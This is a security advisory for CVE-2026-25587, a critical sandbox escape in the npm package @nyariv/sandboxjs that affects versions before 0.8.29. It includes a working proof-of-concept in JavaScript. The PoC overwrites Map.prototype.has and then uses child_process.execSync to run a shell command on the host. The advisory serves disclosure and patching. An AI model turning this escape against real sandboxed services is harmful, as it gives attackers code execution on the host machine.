CVE-2026-25587
CRITICAL10.0EPSS 0.03%@nyariv/sandboxjs has a Sandbox Escape vulnerability
描述
### Summary As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via `Map.prototype`. By overwriting `Map.prototype.has` the sandbox can be escaped. ### Details This is effectively equivalent to CVE-2026-25142, but without `__lookupGetter__` (`let` was used during testing), it turns out the `let` implementation is bugged: ```js let a = Map.prototype; console.log(a) // undefined ``` ```js const a = Map.prototype; console.log(a) // Object [Map] {} ``` ```js let a = 123; console.log(a) // 123 ``` ```js const a = 123; console.log(a) // 123 ``` ### PoC ```js const s = require("@nyariv/sandboxjs").default; const sb = new s(); payload = ` const m = Map.prototype; m.has = isFinite; console.log( isFinite.constructor( "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()", )(), );`; sb.compile(payload)().run(); ``` ### Impact Able to set `Map.prototype.has` -> RCE
受影響套件(1)
- npm/@nyariv/sandboxjsfrom 0, < 0.8.29
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |